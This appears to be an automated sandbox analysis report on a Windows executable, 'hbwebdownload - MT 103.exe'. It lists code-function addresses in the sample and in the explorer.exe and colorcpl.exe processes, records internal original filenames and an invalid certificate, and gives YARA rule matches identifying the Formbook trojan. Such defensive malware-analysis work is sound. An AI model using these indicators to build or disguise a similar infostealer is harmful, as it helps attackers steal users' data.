Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 0_2_07562280	0_2_07562280
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_00401030	4_2_00401030
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0041D89D	4_2_0041D89D
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0041DA88	4_2_0041DA88
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0041DBA8	4_2_0041DBA8
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_00402D87	4_2_00402D87
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_00402D90	4_2_00402D90
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_00409E5B	4_2_00409E5B
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_00409E60	4_2_00409E60
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0041DFD5	4_2_0041DFD5
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0041E792	4_2_0041E792
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_00402FB0	4_2_00402FB0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01280100	4_2_01280100
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132A118	4_2_0132A118
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01318158	4_2_01318158
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013441A2	4_2_013441A2
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013501AA	4_2_013501AA
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013481CC	4_2_013481CC
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01322000	4_2_01322000
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0134A352	4_2_0134A352
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013503E6	4_2_013503E6
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0129E3F0	4_2_0129E3F0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01330274	4_2_01330274
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013102C0	4_2_013102C0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290535	4_2_01290535
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01350591	4_2_01350591
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01334420	4_2_01334420
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01342446	4_2_01342446
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0133E4F6	4_2_0133E4F6
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290770	4_2_01290770
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B4750	4_2_012B4750
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128C7C0	4_2_0128C7C0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AC6E0	4_2_012AC6E0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A6962	4_2_012A6962
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012929A0	4_2_012929A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0135A9A6	4_2_0135A9A6
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0129A840	4_2_0129A840
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01292840	4_2_01292840
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012768B8	4_2_012768B8
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BE8F0	4_2_012BE8F0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0134AB40	4_2_0134AB40
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01346BD7	4_2_01346BD7
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128EA80	4_2_0128EA80
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0129AD00	4_2_0129AD00
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132CD1F	4_2_0132CD1F
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A8DBF	4_2_012A8DBF
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128ADE0	4_2_0128ADE0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290C00	4_2_01290C00
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01330CB5	4_2_01330CB5
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01280CF2	4_2_01280CF2
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01332F30	4_2_01332F30
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012D2F28	4_2_012D2F28
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B0F30	4_2_012B0F30
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01304F40	4_2_01304F40
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130EFA0	4_2_0130EFA0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0129CFE0	4_2_0129CFE0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01282FC8	4_2_01282FC8
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0134EE26	4_2_0134EE26
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290E59	4_2_01290E59
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0134CE93	4_2_0134CE93
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A2E90	4_2_012A2E90
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0134EEDB	4_2_0134EEDB
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C516C	4_2_012C516C
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0127F172	4_2_0127F172
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0135B16B	4_2_0135B16B
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0129B1B0	4_2_0129B1B0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0134F0E0	4_2_0134F0E0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013470E9	4_2_013470E9
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012970C0	4_2_012970C0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0133F0CC	4_2_0133F0CC
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0134132D	4_2_0134132D
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0127D34C	4_2_0127D34C
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012D739A	4_2_012D739A
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012952A0	4_2_012952A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013312ED	4_2_013312ED
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AB2C0	4_2_012AB2C0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01347571	4_2_01347571
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132D5B0	4_2_0132D5B0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013595C3	4_2_013595C3
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0134F43F	4_2_0134F43F
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01281460	4_2_01281460
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0134F7B0	4_2_0134F7B0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012D5630	4_2_012D5630
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013416CC	4_2_013416CC
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01325910	4_2_01325910
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01299950	4_2_01299950
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AB950	4_2_012AB950
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FD800	4_2_012FD800
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012938E0	4_2_012938E0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0134FB76	4_2_0134FB76
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AFB80	4_2_012AFB80
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01305BF0	4_2_01305BF0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012CDBF9	4_2_012CDBF9
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01303A6C	4_2_01303A6C
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01347A46	4_2_01347A46
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0134FA49	4_2_0134FA49
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012D5AA0	4_2_012D5AA0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01331AA3	4_2_01331AA3
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132DAAC	4_2_0132DAAC
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0133DAC6	4_2_0133DAC6
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01347D73	4_2_01347D73
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01293D40	4_2_01293D40
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01341D5A	4_2_01341D5A
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AFDC0	4_2_012AFDC0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01309C32	4_2_01309C32
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0134FCF2	4_2_0134FCF2
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0134FF09	4_2_0134FF09
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0134FFB1	4_2_0134FFB1
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01291F92	4_2_01291F92
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01299EB0	4_2_01299EB0
Source: C:\Windows\explorer.exe	Code function: 6_2_0E6F8232	6_2_0E6F8232
Source: C:\Windows\explorer.exe	Code function: 6_2_0E6F2B32	6_2_0E6F2B32
Source: C:\Windows\explorer.exe	Code function: 6_2_0E6F2B30	6_2_0E6F2B30
Source: C:\Windows\explorer.exe	Code function: 6_2_0E6F7036	6_2_0E6F7036
Source: C:\Windows\explorer.exe	Code function: 6_2_0E6EE082	6_2_0E6EE082
Source: C:\Windows\explorer.exe	Code function: 6_2_0E6EFD02	6_2_0E6EFD02
Source: C:\Windows\explorer.exe	Code function: 6_2_0E6F5912	6_2_0E6F5912
Source: C:\Windows\explorer.exe	Code function: 6_2_0E6FB5CD	6_2_0E6FB5CD
Source: C:\Windows\explorer.exe	Code function: 6_2_0E7E1232	6_2_0E7E1232
Source: C:\Windows\explorer.exe	Code function: 6_2_0E7E0036	6_2_0E7E0036
Source: C:\Windows\explorer.exe	Code function: 6_2_0E7D7082	6_2_0E7D7082
Source: C:\Windows\explorer.exe	Code function: 6_2_0E7DBB30	6_2_0E7DBB30
Source: C:\Windows\explorer.exe	Code function: 6_2_0E7DBB32	6_2_0E7DBB32
Source: C:\Windows\explorer.exe	Code function: 6_2_0E7DE912	6_2_0E7DE912
Source: C:\Windows\explorer.exe	Code function: 6_2_0E7D8D02	6_2_0E7D8D02
Source: C:\Windows\explorer.exe	Code function: 6_2_0E7E45CD	6_2_0E7E45CD
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0488E4F6	7_2_0488E4F6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04884420	7_2_04884420
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04892446	7_2_04892446
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_048A0591	7_2_048A0591
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047E0535	7_2_047E0535
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047FC6E0	7_2_047FC6E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047E0770	7_2_047E0770
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047DC7C0	7_2_047DC7C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04804750	7_2_04804750
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04872000	7_2_04872000
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_048A01AA	7_2_048A01AA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_048941A2	7_2_048941A2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_048981CC	7_2_048981CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047D0100	7_2_047D0100
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0487A118	7_2_0487A118
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04868158	7_2_04868158
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_048602C0	7_2_048602C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04880274	7_2_04880274
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_048A03E6	7_2_048A03E6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047EE3F0	7_2_047EE3F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0489A352	7_2_0489A352
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04880CB5	7_2_04880CB5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047E0C00	7_2_047E0C00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047D0CF2	7_2_047D0CF2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047EAD00	7_2_047EAD00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0487CD1F	7_2_0487CD1F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047DADE0	7_2_047DADE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047F8DBF	7_2_047F8DBF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0489CE93	7_2_0489CE93
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047E0E59	7_2_047E0E59
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0489EEDB	7_2_0489EEDB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0489EE26	7_2_0489EE26
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047F2E90	7_2_047F2E90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0485EFA0	7_2_0485EFA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047ECFE0	7_2_047ECFE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04822F28	7_2_04822F28
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04800F30	7_2_04800F30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047D2FC8	7_2_047D2FC8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04882F30	7_2_04882F30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04854F40	7_2_04854F40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047E2840	7_2_047E2840
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047EA840	7_2_047EA840
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0480E8F0	7_2_0480E8F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047C68B8	7_2_047C68B8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047F6962	7_2_047F6962
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_048AA9A6	7_2_048AA9A6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047E29A0	7_2_047E29A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047DEA80	7_2_047DEA80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04896BD7	7_2_04896BD7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0489AB40	7_2_0489AB40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047D1460	7_2_047D1460
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0489F43F	7_2_0489F43F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0487D5B0	7_2_0487D5B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_048A95C3	7_2_048A95C3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04897571	7_2_04897571
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_048916CC	7_2_048916CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04825630	7_2_04825630
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0489F7B0	7_2_0489F7B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0488F0CC	7_2_0488F0CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_048970E9	7_2_048970E9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0489F0E0	7_2_0489F0E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047E70C0	7_2_047E70C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047CF172	7_2_047CF172
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047EB1B0	7_2_047EB1B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_048AB16B	7_2_048AB16B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0481516C	7_2_0481516C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_048812ED	7_2_048812ED
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047FB2C0	7_2_047FB2C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047E52A0	7_2_047E52A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0482739A	7_2_0482739A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047CD34C	7_2_047CD34C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0489132D	7_2_0489132D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0489FCF2	7_2_0489FCF2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04859C32	7_2_04859C32
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047E3D40	7_2_047E3D40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047FFDC0	7_2_047FFDC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04891D5A	7_2_04891D5A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04897D73	7_2_04897D73
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047E9EB0	7_2_047E9EB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0489FFB1	7_2_0489FFB1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0489FF09	7_2_0489FF09
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047A3FD2	7_2_047A3FD2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047A3FD5	7_2_047A3FD5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047E1F92	7_2_047E1F92
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0484D800	7_2_0484D800
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047E38E0	7_2_047E38E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047E9950	7_2_047E9950
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047FB950	7_2_047FB950
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04875910	7_2_04875910
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04825AA0	7_2_04825AA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0487DAAC	7_2_0487DAAC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04881AA3	7_2_04881AA3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0488DAC6	7_2_0488DAC6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0489FA49	7_2_0489FA49
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04897A46	7_2_04897A46
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04853A6C	7_2_04853A6C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04855BF0	7_2_04855BF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0481DBF9	7_2_0481DBF9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0489FB76	7_2_0489FB76
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047FFB80	7_2_047FFB80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_005CE792	7_2_005CE792
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_005B2D90	7_2_005B2D90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_005B2D87	7_2_005B2D87
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_005B9E5B	7_2_005B9E5B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_005B9E60	7_2_005B9E60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_005B2FB0	7_2_005B2FB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0469A036	7_2_0469A036
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04692D02	7_2_04692D02
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0469E5CD	7_2_0469E5CD
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04691082	7_2_04691082
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04698912	7_2_04698912
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0469B232	7_2_0469B232
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04695B30	7_2_04695B30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04695B32	7_2_04695B32

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 04815130 appears 58 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 0484EA12 appears 86 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 04827E54 appears 111 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 0485F290 appears 105 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 047CB970 appears 280 times
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: String function: 012C5130 appears 58 times
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: String function: 0127B970 appears 280 times
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: String function: 012FEA12 appears 86 times
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: String function: 012D7E54 appears 111 times
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: String function: 0130F290 appears 105 times

Source: hbwebdownload - MT 103.exe

Static PE information: invalid certificate

Source: hbwebdownload - MT 103.exe, 00000000.00000000.2057684443.0000000000B52000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameQZ.exe, vs hbwebdownload - MT 103.exe
Source: hbwebdownload - MT 103.exe, 00000000.00000002.2092991914.0000000004A7A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs hbwebdownload - MT 103.exe
Source: hbwebdownload - MT 103.exe, 00000000.00000002.2095458209.00000000078C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs hbwebdownload - MT 103.exe
Source: hbwebdownload - MT 103.exe, 00000000.00000002.2090002838.000000000107E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs hbwebdownload - MT 103.exe
Source: hbwebdownload - MT 103.exe, 00000000.00000002.2095226151.000000000759B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.E vs hbwebdownload - MT 103.exe
Source: hbwebdownload - MT 103.exe, 00000004.00000002.2146139487.0000000002F93000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamecolorcpl.exej% vs hbwebdownload - MT 103.exe
Source: hbwebdownload - MT 103.exe, 00000004.00000002.2141231992.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamecolorcpl.exej% vs hbwebdownload - MT 103.exe
Source: hbwebdownload - MT 103.exe, 00000004.00000002.2144698511.000000000137D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs hbwebdownload - MT 103.exe
Source: hbwebdownload - MT 103.exe	Binary or memory string: OriginalFilenameQZ.exe, vs hbwebdownload - MT 103.exe

Source: hbwebdownload - MT 103.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 4.2.hbwebdownload - MT 103.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 4.2.hbwebdownload - MT 103.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.hbwebdownload - MT 103.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
